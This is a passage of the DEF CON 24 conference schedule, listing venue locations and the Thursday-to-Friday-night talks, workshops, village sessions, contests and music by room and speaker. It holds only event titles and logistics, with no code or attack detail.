Index
Venue Maps
Locations Legends and Info
Schedule
- Thursday
- Friday
- Saturday
- Sunday
Speaker List
Talk Title List
Talk Descriptions
DEF CON News
DEF CON Entertainment
DEF CON 24 FAQ
DEF CON FAQ
Links to DEF CON 24 related pages
Venue Maps
Closeup of Bally's convention area and Indigo Tower map.
Convention area is past the elevator banks.
Indigo Tower is up the first elevator bank to the 26th floor.
Closeup of Paris convention area map.
The Paris convention area is half way through the shops area between Bally's and Paris in a side corridor.
Closeup of Jubilee Tower area map.
From Bally's head towards the strip, go past the registration desk and just before you walk outdoors head left. The Jubilee Tower elevators and escalators are in the far corner.
Locations Legends and Info
BHV = Bio Hacking Village
Skyview 4
CPV = Crypto Privacy Village
Bronze 1
Bronze 2
DC = DEF CON
DC 101
Track 1
Track 2
Track 3
DL = DemoLabs
Grand Salon
HHV = Hardware Hacking Village
Bally's - Contest Area
IOT = IOT Village (InternetOfThings)
Bronze 4
SE = Social Engineering
Palace 2-5
ST = Skytalks
Skyview 3
WOS = Wall of Sheep / Packet Hacking Village
Skyview 6
WS = Workshops
LV BR 1 = Las Vegas Ballroom 1
LV BR 2 = Las Vegas Ballroom 2
LV BR 3 = Las Vegas Ballroom 3
LV BR 4 = Las Vegas Ballroom 4
LV BR 5 = Las Vegas Ballroom 5
LV BR 6 = Las Vegas Ballroom 6
LV BR 7 = Las Vegas Ballroom 7
WV = Wireless Village
Skyview 1
Talk/Event Schedule
Thursday
This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.
Thursday - 10:00
Return to Index - Locations Legend
DC - DC 101 - Machine Duping 101: Pwning Deep Learning Systems - Clarence Chio
WS - LV BR 1 - Operation Dark Tangent: The Def Con Messaging Protocol (DCMP) - Eijah
WS - LV BR 2 - Intro to Memory Forensics With Volatility - Miguel Antonio Guirao Aguilera
WS - LV BR 3 - Writing Your First Exploit - Rob Olson
WS - LV BR 4 - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - The In’s and Outs of Steganography - Chuck Easttom
WS - LV BR 6 - Hacking Network Protocols using Kali - Thomas Wilhelm & Todd Kendall
WS - LV BR 7 - Pentesting ICS 101 - Arnaud Soullie
Thursday - 11:00
Return to Index - Locations Legend
DC - DC 101 - Maelstrom - Are You Playing with a Full Deck?... - Shane Steiger
WS - LV BR 1 - cont...(10:00-14:00) - Operation Dark Tangent: The Def Con Messaging Protocol (DCMP) - Eijah
WS - LV BR 2 - cont...(10:00-14:00) - Intro to Memory Forensics With Volatility - Miguel Antonio Guirao Aguilera
WS - LV BR 3 - cont...(10:00-14:00) - Writing Your First Exploit - Rob Olson
WS - LV BR 4 - cont...(10:00-14:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(10:00-14:00) - The In’s and Outs of Steganography - Chuck Easttom
WS - LV BR 6 - cont...(10:00-14:00) - Hacking Network Protocols using Kali - Thomas Wilhelm & Todd Kendall
WS - LV BR 7 - cont...(10:00-14:00) - Pentesting ICS 101 - Arnaud Soullie
Thursday - 12:00
Return to Index - Locations Legend
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
DC - DC 101 - Beyond the MCSE: Red Teaming Active Directory - Sean Metcalf
WS - LV BR 1 - cont...(10:00-14:00) - Operation Dark Tangent: The Def Con Messaging Protocol (DCMP) - Eijah
WS - LV BR 2 - cont...(10:00-14:00) - Intro to Memory Forensics With Volatility - Miguel Antonio Guirao Aguilera
WS - LV BR 3 - cont...(10:00-14:00) - Writing Your First Exploit - Rob Olson
WS - LV BR 4 - cont...(10:00-14:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(10:00-14:00) - The In’s and Outs of Steganography - Chuck Easttom
WS - LV BR 6 - cont...(10:00-14:00) - Hacking Network Protocols using Kali - Thomas Wilhelm & Todd Kendall
WS - LV BR 7 - cont...(10:00-14:00) - Pentesting ICS 101 - Arnaud Soullie
Thursday - 13:00
Return to Index - Locations Legend
DC - DC 101 - Weaponize Your Feature Codes - Nicholas Rosario (MasterChen)
WS - LV BR 1 - cont...(10:00-14:00) - Operation Dark Tangent: The Def Con Messaging Protocol (DCMP) - Eijah
WS - LV BR 2 - cont...(10:00-14:00) - Intro to Memory Forensics With Volatility - Miguel Antonio Guirao Aguilera
WS - LV BR 3 - cont...(10:00-14:00) - Writing Your First Exploit - Rob Olson
WS - LV BR 4 - cont...(10:00-14:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(10:00-14:00) - The In’s and Outs of Steganography - Chuck Easttom
WS - LV BR 6 - cont...(10:00-14:00) - Hacking Network Protocols using Kali - Thomas Wilhelm & Todd Kendall
WS - LV BR 7 - cont...(10:00-14:00) - Pentesting ICS 101 - Arnaud Soullie
Thursday - 14:00
Return to Index - Locations Legend
DC - DC 101 - Realtime bluetooth device detection with Blue Hydra - Zero_Chaos & Granolocks
Thursday - 15:00
Return to Index - Locations Legend
DC - DC 101 - Hacker Fundamentals and Cutting Through Abstraction - LosT
WS - LV BR 1 - C/C++ Boot Camp for Hackers - Eijah
WS - LV BR 2 - Windows Breakout and Privilege Escalation Workshop - Ruben Boonen & Francesco Mifsud
WS - LV BR 3 - Hunting Malware at Scale with osquery - Sereyvathana Ty, Nick Anderson, Javier Marcos de Prado, Teddy Reed
WS - LV BR 4 - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - Use Microsoft Free Security Tools as a Ninja - Simon Roses
WS - LV BR 6 - Intrusion Prevention System (IPS) Evasion Techniques - Thomas Wilhelm & John Spearing
WS - LV BR 7 - Open Source Malware Lab - Robert Simmons
Thursday - 16:00
Return to Index - Locations Legend
DC - DC 101 - DEF CON 101 Panel - DC101
WS - LV BR 1 - cont...(15:00-19:00) - C/C++ Boot Camp for Hackers - Eijah
WS - LV BR 2 - cont...(15:00-19:00) - Windows Breakout and Privilege Escalation Workshop - Ruben Boonen & Francesco Mifsud
WS - LV BR 3 - cont...(15:00-19:00) - Hunting Malware at Scale with osquery - Sereyvathana Ty, Nick Anderson, Javier Marcos de Prado, Teddy Reed
WS - LV BR 4 - cont...(15:00-19:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(15:00-19:00) - Use Microsoft Free Security Tools as a Ninja - Simon Roses
WS - LV BR 6 - cont...(15:00-19:00) - Intrusion Prevention System (IPS) Evasion Techniques - Thomas Wilhelm & John Spearing
WS - LV BR 7 - cont...(15:00-19:00) - Open Source Malware Lab - Robert Simmons
Thursday - 17:00
Return to Index - Locations Legend
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
Paris - Main Ballroom - Cyber Grand Challenge - The World's First All-Machine Hacking Tournament
WS - LV BR 1 - cont...(15:00-19:00) - C/C++ Boot Camp for Hackers - Eijah
WS - LV BR 2 - cont...(15:00-19:00) - Windows Breakout and Privilege Escalation Workshop - Ruben Boonen & Francesco Mifsud
WS - LV BR 3 - cont...(15:00-19:00) - Hunting Malware at Scale with osquery - Sereyvathana Ty, Nick Anderson, Javier Marcos de Prado, Teddy Reed
WS - LV BR 4 - cont...(15:00-19:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(15:00-19:00) - Use Microsoft Free Security Tools as a Ninja - Simon Roses
WS - LV BR 6 - cont...(15:00-19:00) - Intrusion Prevention System (IPS) Evasion Techniques - Thomas Wilhelm & John Spearing
WS - LV BR 7 - cont...(15:00-19:00) - Open Source Malware Lab - Robert Simmons
Thursday - 18:00
Return to Index - Locations Legend
Paris - Main Ballroom - cont...(17:00-19:59) - Cyber Grand Challenge - The World's First All-Machine Hacking Tournament
WS - LV BR 1 - cont...(15:00-19:00) - C/C++ Boot Camp for Hackers - Eijah
WS - LV BR 2 - cont...(15:00-19:00) - Windows Breakout and Privilege Escalation Workshop - Ruben Boonen & Francesco Mifsud
WS - LV BR 3 - cont...(15:00-19:00) - Hunting Malware at Scale with osquery - Sereyvathana Ty, Nick Anderson, Javier Marcos de Prado, Teddy Reed
WS - LV BR 4 - cont...(15:00-19:00) - Raspberry Pi and Kali Deluxe Spy workshop - Dallas & Sean Satterlee (ohm)
WS - LV BR 5 - cont...(15:00-19:00) - Use Microsoft Free Security Tools as a Ninja - Simon Roses
WS - LV BR 6 - cont...(15:00-19:00) - Intrusion Prevention System (IPS) Evasion Techniques - Thomas Wilhelm & John Spearing
WS - LV BR 7 - cont...(15:00-19:00) - Open Source Malware Lab - Robert Simmons
Thursday - 19:00
Return to Index - Locations Legend
Paris - Main Ballroom - cont...(17:00-19:59) - Cyber Grand Challenge - The World's First All-Machine Hacking Tournament
Thursday - 20:00
Return to Index - Locations Legend
Paris - Track 2 - Music - Collin Sullivan
Thursday - 21:00
Return to Index - Locations Legend
Paris - Track 2 - Music - DJ %27
Thursday - 22:00
Return to Index - Locations Legend
Paris - Track 2 - Music - ZackBarbie
Thursday - 23:00
Return to Index - Locations Legend
Paris - Track 2 - Music - Alikat
Friday - 00:00
Return to Index - Locations Legend
Paris - Track 2 - Music - VJ Q.Alba
Friday - 01:00
Return to Index - Locations Legend
Paris - Track 2 - Music - DJ Stealth Duck
Friday
This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.
Friday - 09:00
Return to Index - Locations Legend
ST - Skyview 3 - The trials & tribulations of an infosec pro in the government sector - Grecs
Friday - 10:00
Return to Index - Locations Legend
BHV - Skyview 4 - WELCOME TO BHV! - Staff
BHV - Skyview 4 - Biohacking: The Moral Imperative to Build a Better You - Tim Cannon
BHV - Skyview 4 - The Patient as CEO - Robin Farmanfarmaian
BHV - Skyview 4 - Future Grind - Ryan O'Shea
BHV - Skyview 4 - Fancy Dancy Implanty - Amal Graafstra
BHV - Skyview 4 - WELCOME TO BHV! - Staff
BHV - Skyview 4 - Biohacking: The Moral Imperative to Build a Better You - Tim Cannon
BHV - Skyview 4 - The Patient as CEO - Robin Farmanfarmaian
CPV - Bronze 2 - Open House - Welcome
CPV - Bronze 2 - Tabletop Cryptography - nibb13
DC - DC 101 - BSODomizer HD: A mischievous FPGA and HDMI platform for the (m)asses - Joe Grand (Kingpin)&Zoz
DC - Track 1 - Feds and 0Days: From Before Heartbleed to After FBI-Apple - Jay Healey
DC - Track 3 - Introduction the Wichcraft Compiler Collection : Towards universal code theft - Jonathan Brossard (endrazine)
DC - Track 2 - DARPA Cyber Grand Challenge Award Ceremony - Mike Walker & Dr. Arati Prabhakar
HHV - Contest Area - Workshop-Hands on JTAG for Fun and Root Shells II - Joe FitzPatrick, Piotr Esden-Tempski
IOT - Bronze 4 - Exploiting a Smart Fridge: a Case Study in Kinetic Cyber - Kevin Cooper
ST - Skyview 3 - Automated DNS Data Exfiltration and Mitigation - Nolan Berry, Towne Besel
WS - LV BR 1 - Mobile App Attack : Taming the evil app! - Sneha Rajguru
WS - LV BR 2 - Car Hacking Workshop - Robert Leale & Nathan Hoch
WS - LV BR 3 - VoIP Wars: The Live Workshop - Fatih Ozavci
WS - LV BR 4 - Exploit Development for Beginners - Sam Bowne & Dylan James Smith
WS - LV BR 5 - Introduction to x86 disassembly - Dazzle Cat Duo
WS - LV BR 6 - Introduction to Penetration Testing with Metasploit - Georgia Weidman
WS - LV BR 7 - XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer - Mike Fauzy
WOS - Skyview 6 - Opening Ceremony
Friday - 11:00
Return to Index - Locations Legend
BHV - Skyview 4 - Psychoactive Chemicals in Combat - Amanda Plimpton/Evan Anderson
BHV - Skyview 4 - My dog is a hacker and will steal your data! - Rafael Fontes Souza
BHV - Skyview 4 - Biosafety for the Home Enthusiast - Mr_Br!ml3y
BHV - Skyview 4 - Implants - Amal Graafstra
BHV - Skyview 4 - Psychoactive Chemicals in Combat - Amanda Plimpton/Evan Anderson
BHV - Skyview 4 - My dog is a hacker and will steal your data! - Rafael Fontes Souza
CPV - Bronze 2 - Keynote: This year in Crypto & Privacy
DC - DC 101 - Meet the Feds - Jonathan Mayer & Panel
DC - Track 1 - Compelled Decryption - State of the Art in Doctrinal Perversions - Ladar Levison
DC - Track 2 - Project CITL - Mudge Zatko &Sarah Zatko
HHV - Contest Area - cont...(10:00-11:59) - Workshop-Hands on JTAG for Fun and Root Shells II - Joe FitzPatrick, Piotr Esden-Tempski
IOT - Bronze 4 - TBA - Paul Dant
ST - Skyview 3 - DNS Greylisting for Phun and Phishing Prevention - Munin
WV - Skyview 1 - Reversing LoRa: Deconstructing a Next-Gen Proprietary LPWAN - Matt Knight
WS - LV BR 1 - cont...(10:00-14:00) - Mobile App Attack : Taming the evil app! - Sneha Rajguru
WS - LV BR 2 - cont...(10:00-14:00) - Car Hacking Workshop - Robert Leale & Nathan Hoch
WS - LV BR 3 - cont...(10:00-14:00) - VoIP Wars: The Live Workshop - Fatih Ozavci
WS - LV BR 4 - cont...(10:00-14:00) - Exploit Development for Beginners - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(10:00-14:00) - Introduction to x86 disassembly - Dazzle Cat Duo
WS - LV BR 6 - cont...(10:00-14:00) - Introduction to Penetration Testing with Metasploit - Georgia Weidman
WS - LV BR 7 - cont...(10:00-14:00) - XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer - Mike Fauzy
WOS - Skyview 6 - Music - DJ - phreakocious
WOS - Skyview 6 - Presenting Security Metrics to the Board / Leadership - Walt Williams
Friday - 12:00
Return to Index - Locations Legend
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
Ballys - Contest Area - DEF CON Beard and Moustache Contest
Ballys - Contest Area - "Beverage" Cooling Contraption Contest (BCCC)
BHV - Skyview 4 - The Bitcoin DNA Challenge - Keoni Gandall
BHV - Skyview 4 - Biohacking for National Security - Renee Wegzyn and Doug Weber
BHV - Skyview 4 - Flavor-Tripping: a Whole New Way to Taste! - Alan
BHV - Skyview 4 - The Bitcoin DNA Challenge - Keoni Gandall
CPV - Bronze 2 - Practical Text-Based Steganography: Exfiltrating Data from Secure Networks and Socially Engineering SecOps Analysts [WORKSHOP] - Joe Gervais (TryCatchHCF) - Principal InfoSec Engineer / Lead Pentester at Lifelock
DC - DC 101 - 411: A framework for managing security alerts - Kai Zhong
DC - Track 1 - Honey Onions: Exposing Snooping Tor HSDir Relays - Guevara Noubir & Amirali Sanatinia
DC - Track 1 - Frontrunning The Frontrunners - Dr. Paul Vixie
DC - Track 3 - Cheap Tools for Hacking Heavy Trucks - Six_Volts &Haystack
DC - Track 3 - CAN i haz car secret plz? - Javier Vazquez Vidal &Ferdinand Noelscher
DC - Track 2 - BlockFighting with a Hooker -- BlockfFghter2! - K2
HHV - Contest Area - Building malicious hardware out of analog circuits - Matthew Hicks
IOT - Bronze 4 - FCC 5G/IoT Security Policy Objectives - Rear Admiral (ret.) David Simpson, FCC, Bureau Chief
ST - Skyview 3 - Rotten to the core white box switching as the new abandonware - Brian Redbeard
WV - Skyview 1 - How Do I "BLE Hacking"? - Jose Gutierrez and Ben Ramsey
WV - Skyview 1 - Handing Full Control of the Radio Spectrum Over to the Machines - Tim O'Shea
WS - LV BR 1 - cont...(10:00-14:00) - Mobile App Attack : Taming the evil app! - Sneha Rajguru
WS - LV BR 2 - cont...(10:00-14:00) - Car Hacking Workshop - Robert Leale & Nathan Hoch
WS - LV BR 3 - cont...(10:00-14:00) - VoIP Wars: The Live Workshop - Fatih Ozavci
WS - LV BR 4 - cont...(10:00-14:00) - Exploit Development for Beginners - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(10:00-14:00) - Introduction to x86 disassembly - Dazzle Cat Duo
WS - LV BR 6 - cont...(10:00-14:00) - Introduction to Penetration Testing with Metasploit - Georgia Weidman
WS - LV BR 7 - cont...(10:00-14:00) - XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer - Mike Fauzy
WOS - Skyview 6 - Music - DJ - AliKat
WOS - Skyview 6 - Deceive and Succeed: Measuring the Efficiency of a Deception Eco-System in Post-Breach Detection - Omer Zohar
Friday - 13:00
Return to Index - Locations Legend
Ballys - Contest Area - DEF CON Beard and Moustache Contest
Ballys - Contest Area - cont...(12:00-13:30) -
BHV - Skyview 4 - Tales from a healthcare hacker - Kevin Sacco
BHV - Skyview 4 - Implants: Show and Tell - c00p3r
BHV - Skyview 4 - Tales from a healthcare hacker - Kevin Sacco
BHV - Skyview 4 - Implants: Show and Tell - c00p3r
CPV - Bronze 2 - When Privacy Goes Poof! Why It's Gone and Never Coming Back - Richard Thieme (Neuralcowboy) - ThiemeWorks
DC - DC 101 - Sentient Storage - Do SSDs Have a Mind of Their Own? - Tom Kopchak
DC - Track 1 - Research on the Machines: Help the FTC Protect Privacy & Security - Terrell McSweeny & Lorrie Cranor
DC - Track 3 - How to Make Your Own DEF CON Black Badge - Badge Hacker Panel
DC - Track 2 - (Ab)using Smart Cities: the dark age of modern mobility - Matteo Beccaro & Matteo Collura
IOT - Bronze 1 - Sense & Avoid: Some laws to know before you break IoT - Elizabeth Wharton
ST - Skyview 3 - A Guide to Outsmarting the Machines - joseph, nephifetnf
Venders Area - No Starch Press booth - Craig Smith, The Car Hackers Handbook - book signing
WV - Skyview 1 - Introducing the HackMeRF - Brian Butterly and Stefan Kiese
WV - Skyview 2 - Ham Radio Exams
WS - LV BR 1 - cont...(10:00-14:00) - Mobile App Attack : Taming the evil app! - Sneha Rajguru
WS - LV BR 2 - cont...(10:00-14:00) - Car Hacking Workshop - Robert Leale & Nathan Hoch
WS - LV BR 3 - cont...(10:00-14:00) - VoIP Wars: The Live Workshop - Fatih Ozavci
WS - LV BR 4 - cont...(10:00-14:00) - Exploit Development for Beginners - Sam Bowne & Dylan James Smith
WS - LV BR 5 - cont...(10:00-14:00) - Introduction to x86 disassembly - Dazzle Cat Duo
WS - LV BR 6 - cont...(10:00-14:00) - Introduction to Penetration Testing with Metasploit - Georgia Weidman
WS - LV BR 7 - cont...(10:00-14:00) - XSS Remediation: All the questions you were wise enough to ask, but your security team is too afraid to answer - Mike Fauzy
WOS - Skyview 6 - Music - DJ - djdead
WOS - Skyview 6 - Adding Ramparts to Your Bastille: An Introduction to SELinux Hardening - Jay Beale
Friday - 14:00
Return to Index - Locations Legend
BHV - Skyview 4 - Sensory Augmentation 101 - Trevor Goodman
BHV - Skyview 4 - Health as a service... - Julian Dana
BHV - Skyview 4 - Sensory Augmentation 101 - Trevor Goodman
BHV - Skyview 4 - Health as a service... - Julian Dana
CPV - Bronze 2 - Lessons from the Hacking of Ashley Madison - Per Thorsheim - Founder at PasswordsCon
DC - DC 101 - Anti-Forensics AF - int0x80
DC - Track 1 - How to design distributed systems resilient despite malicious participants - Radia Perlman
DC - Track 3 - Direct Memory Attack the Kernel - Ulf Frisk
DC - Track 2 - A Monitor Darkly: Reversing and Exploiting Ubiquitous... - Ang Cui
IOT - Bronze 4 - Picking Bluetooth Low Energy Locks from a Quarter Mile Away - Anthony Rose
ST - Skyview 3 - Financial Crime: Past, Present, and Future - Marcello Mansur
WV - Skyview 1 - Detecting and Finding Rogue Access Points - Eric Escobar and Matt Trimble
WV - Skyview 2 - cont...(13:00-17:59) - Ham Radio Exams
WS - LV BR 1 - Practical Android Application Exploitation - Dinesh Shetty & Aditya Gupta
WS - LV BR 2 - You CAN haz fun with with cars! - Javier Vazquez Vidal & Ferdinand Noelscher
WS - LV BR 3 - Analyzing Internet Attacks with Honeypots - Ioannis Koniaris
WS - LV BR 5 - Nmap NSE development for offense and defense - Paulino Calderon & Tom Sellers
WS - LV BR 6 - Pragmatic Cloud Security: Hands-On Turbocharged Edition - Rich Mogull
WS - LV BR 7 - Advanced Blind SQL Injection Exploitation - David Caissy
WOS - Skyview 6 - Music - DJ - tense future
WOS - Skyview 6 - You Are Being Manipulated - GrayRaven
Friday - 15:00
Return to Index - Locations Legend
BHV - Skyview 4 - Computational Chemistry on a Budget - Mr. Br!ml3y
BHV - Skyview 4 - Trigraph: An Ethereum-based Teleradiology Application - Ryan Schmoll and Peter Hefley
BHV - Skyview 4 - Rise of the Lovetron9000 - Rich Lee
BHV - Skyview 4 - Computational Chemistry on a Budget - Mr. Br!ml3y
BHV - Skyview 4 - Trigraph: An Ethereum-based Teleradiology Application - Ryan Schmoll and Peter Hefley
CPV - Bronze 2 - Instegogram: Exploiting Instagram for C2 via Image Steganography - Amanda Rousseau, Hyrum Anderson, & Daniel Grant - R&D at Endgame
CPV - Bronze 2 - Introducing Man In The Contacts attack to trick encrypted messaging apps - Jrmy Matos - Software Security Expert at SecuringApps
DC - DC 101 - NPRE - Eavesdropping on the Machines - Tim "t0rch" Estell & Katea Murray
DC - Track 1 - How To Remote Control An Airliner: Security Flaws in Avionics - Sebastian Westerhold
DC - Track 3 - The Remote Metamorphic Engine: Detecting, Evading, Attacking the AI and Reverse Engineering - Amro Abdelgawad
DC - Track 2 - Slouching Towards Utopia: The State of the Internet Dream - Jennifer S. Granick
IOT - Bronze 1 - BtleJuice: the Bluetooth Smart Man In The Middle Framework - Damien Cauquil, Digital Security (CERT-UBIK), Senior Security Researcher
ST - Skyview 3 - Breaking Payment Points of Interaction - Nir Vailman, Patrick Watson
Venders Area - No Starch Press booth - Georgia Weidman, Penetration Testing - book signing
WV - Skyview 1 - The Covert Cupid Under .11 Veil !!! /* Approach for Covert WIFI */ - Rushikesh D. Nandedkar and Amrita C. Iyer
WV - Skyview 2 - cont...(13:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Practical Android Application Exploitation - Dinesh Shetty & Aditya Gupta
WS - LV BR 2 - cont...(14:00-18:00) - You CAN haz fun with with cars! - Javier Vazquez Vidal & Ferdinand Noelscher
WS - LV BR 3 - cont...(14:00-18:00) - Analyzing Internet Attacks with Honeypots - Ioannis Koniaris
WS - LV BR 5 - cont...(14:00-18:00) - Nmap NSE development for offense and defense - Paulino Calderon & Tom Sellers
WS - LV BR 6 - cont...(14:00-18:00) - Pragmatic Cloud Security: Hands-On Turbocharged Edition - Rich Mogull
WS - LV BR 7 - cont...(14:00-18:00) - Advanced Blind SQL Injection Exploitation - David Caissy
WOS - Skyview 6 - Music - DJ - TK
WOS - Skyview 6 - Connections: Eisenhower and the Internet - Chef
Friday - 16:00
Return to Index - Locations Legend
BHV - Skyview 4 - Blockchain's Role in the Disruption of the Medical Industry - John Bass
BHV - Skyview 4 - Neurogenic Peptides: Smart Drugs 4-Minute Mile - Gingerbread
BHV - Skyview 4 - To Beat the Toaster, You Must Become the Toaster: How to Show AI Who's Boss in the Robot Apocalypse - Jennifer Szkatulski and Darren Lawless
BHV - Skyview 4 - Blockchain's Role in the Disruption of the Medical Industry - John Bass
BHV - Skyview 4 - Neurogenic Peptides: Smart Drugs 4-Minute Mile - Gingerbread
CPV - Bronze 2 - Getting Started with Cryptography in Python [WORKSHOP] - Amirali Sanatinia - Northeastern University
DC - DC 101 - 101 Ways to Brick your Hardware - Joe FitzPatrick & Joe Grand
DC - Track 1 - Robot Hacks Video Games: How TASBot Exploits Consoles with Custom Controllers - Allan Cecil (dwangoAC)
DC - Track 3 - Mr. Robot Panel - Kor Adana, Dark Tangent, & Marc Rogers
DC - Track 3 - Breaking the Internet of Vibrating Things... - follower & goldfisk
DC - Track 2 - Samsung Pay: Tokenized Numbers, Flaws and Issues - Salvador Mendoza
DC - Track 2 - Side-channel attacks on high-security electronic safe locks - Plore
HHV - Contest Area - Why Ham Radio (still!) in the age of the Internet? And other projects. - Smitty of Halibut, KR6ZY
IOT - Bronze 1 - Is Your Internet Light On? Protecting Consumers in the Age of Connected Everything - Terrell McSweeny, Federal Trade Commission, Commissioner
SE - Palace 2-5 - Does Cultural differences become a barrier for social engineering? - Tomohisa Ishikawa
ST - Skyview 3 - Why Snowden's Leaks Were Inevitable - Jake Williams
Venders Area - No Starch Press booth - Michael Schrenk, Webbots, Spiders, and Screen Scrapers, 2nd Edition - book signing
WV - Skyview 1 - Kickin' It Old Skool: SDR for Ye Olde Signals - Balint Seeber
WV - Skyview 2 - cont...(13:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Practical Android Application Exploitation - Dinesh Shetty & Aditya Gupta
WS - LV BR 2 - cont...(14:00-18:00) - You CAN haz fun with with cars! - Javier Vazquez Vidal & Ferdinand Noelscher
WS - LV BR 3 - cont...(14:00-18:00) - Analyzing Internet Attacks with Honeypots - Ioannis Koniaris
WS - LV BR 5 - cont...(14:00-18:00) - Nmap NSE development for offense and defense - Paulino Calderon & Tom Sellers
WS - LV BR 6 - cont...(14:00-18:00) - Pragmatic Cloud Security: Hands-On Turbocharged Edition - Rich Mogull
WS - LV BR 7 - cont...(14:00-18:00) - Advanced Blind SQL Injection Exploitation - David Caissy
WOS - Skyview 6 - Music - DJ - Moon in Gemini
WOS - Skyview 6 - Automated Dorking for Fun and Profit^WSalary - Filip Reesalu
Friday - 17:00
Return to Index - Locations Legend
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
BHV - Skyview 4 - Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science - David Bach
BHV - Skyview 4 - Human-Human Interface - Charles Tritt
BHV - Skyview 4 - Video Games Can Teach Science: ScienceGameCenter.org - Melanie Stegman, Ph.D.
BHV - Skyview 4 - Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science - David Bach
BHV - Skyview 4 - Human-Human Interface - Charles Tritt
CPV - Bronze 1 - Revocation, the Frailty of PKI - Mat Caughron (cryptofile), Trey Blalock (PrivacyGeek)
CPV - Bronze 2 - cont...(16:00-17:30) - Getting Started with Cryptography in Python [WORKSHOP] - Amirali Sanatinia - Northeastern University
CPV - Bronze 2 - privacy by design - it's n0t that difficult - Petri Koivisto
DC - DC 101 - Malware Command and Control Channels: A journey into darkness - Brad Woodberg
DC - Track 1 - Hacking Next-Gen ATM's From Capture to Cashout. - Weston Hecker
DC - Track 2 - Sk3wlDbg: Emulating all (well many) of the things with Ida - Chris Eagle
IOT - Bronze 4 - Live Drone RF Reverse Engineering - Marc Newlin, Matt Knight, Bastille Networks
SE - Palace 2-5 - The Wizard of Oz – Painting a reality through deception - David Kennedy
ST - Skyview 3 - Lie to Me - LIE TO THEM: Chronicles of "How to save $ at the Strip Club" - Steve Pordon, Buckaroo
WV - Skyview 1 - cont...(16:00-17:50) - Kickin' It Old Skool: SDR for Ye Olde Signals - Balint Seeber
WV - Skyview 2 - cont...(13:00-17:59) - Ham Radio Exams
WS - LV BR 1 - cont...(14:00-18:00) - Practical Android Application Exploitation - Dinesh Shetty & Aditya Gupta
WS - LV BR 2 - cont...(14:00-18:00) - You CAN haz fun with with cars! - Javier Vazquez Vidal & Ferdinand Noelscher
WS - LV BR 3 - cont...(14:00-18:00) - Analyzing Internet Attacks with Honeypots - Ioannis Koniaris
WS - LV BR 5 - cont...(14:00-18:00) - Nmap NSE development for offense and defense - Paulino Calderon & Tom Sellers
WS - LV BR 6 - cont...(14:00-18:00) - Pragmatic Cloud Security: Hands-On Turbocharged Edition - Rich Mogull
WS - LV BR 7 - cont...(14:00-18:00) - Advanced Blind SQL Injection Exploitation - David Caissy
WOS - Skyview 6 - Music - DJ - %27
WOS - Skyview 6 - Verifying IPS Coverage Claims: Here's How - Garett Montgomery
Friday - 18:00
Return to Index - Locations Legend
Ballys - Palace 6 - DEF CON Lawyer Meetup
BHV - Skyview 4 - tDCS workshop - Darren and Jen
BHV - Skyview 4 - BioHacking and Mortal Limitations - Dr. Stan Naydin and Vlad Gostomelsky
BHV - Skyview 4 - tDCS workshop - Darren and Jen
CPV - Bronze 1 - Security Logs Arent Enough: Logging for User Data Protection - Alisha Kloc
CPV - Bronze 2 - State of the Curve - 2016 - Deirdre Connolly - Senior Software Engineer at Brightcove
CPV - Bronze 2 - Open House
IOT - Bronze 4 - cont...(17:00-18:50) - Live Drone RF Reverse Engineering - Marc Newlin, Matt Knight, Bastille Networks
Paris - Le Bar Du Sport - DEFCON 24 Meetup for /r/Defcon -
SE - Palace 2-5 - 7 Jedi Mind Tricks: Influence Your Target With Out A Word - Chris Hadnagy
ST - Skyview 3 - Slack as Intelligence Collector or "how anime cons get weird" - Rick Glass
WV - Skyview 1 - I Amateur Radio (And So Can You!) - Kat Sweet
WOS - Skyview 6 - Music - DJ - VNA
WOS - Skyview 6 - Crawling for APIs - Ryan Mitchell
Friday - 19:00
Return to Index - Locations Legend
CPV - Bronze 1 - How to backdoor Diffie-Hellman - David Wong - Security Consultant at NCC Group
SE - Palace 2-5 - US Interrogation Techniques and Social Engineering - Robert Anderson
Friday - 20:00
Return to Index - Locations Legend
Ballys - Blu Pool - Queercon Pool Party - DJ Bret Law - Seattle -
Ballys - Skyview 5 - Hacker Karaoke
DC - Track 1 - Hacker Jeopardy
Paris - Track 2 - Music - Skittish And Bus
SE - Palace 2-5 - You are being manipulated. - James Powell
Friday - 21:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party
Ballys - Skyview 5 - cont...(21:00-01:59) - Hacker Karaoke
DC - Track 1 - cont...(20:00-21:59) - Hacker Jeopardy
Paris - Napoleon's Piano Bar and Lounge - Music - Richard Cheese & Lounge Against the Machine
Paris - Track 2 - Music - Ninjula
ST - Skyview 3 - Music - 303 - DJ Slave1, DJ Ritual, Mr & Mrs. Hoodbats, Radio Scarlet, Big Daddy Doomsday
Friday - 22:00
Return to Index - Locations Legend
Ballys - Blu Pool - cont...(20:00-03:00) - Queercon Pool Party - Skittish and Bus - Salt Lake City
Ballys - Skyview 5 - cont...(22:00-01:59) - Hacker Karaoke
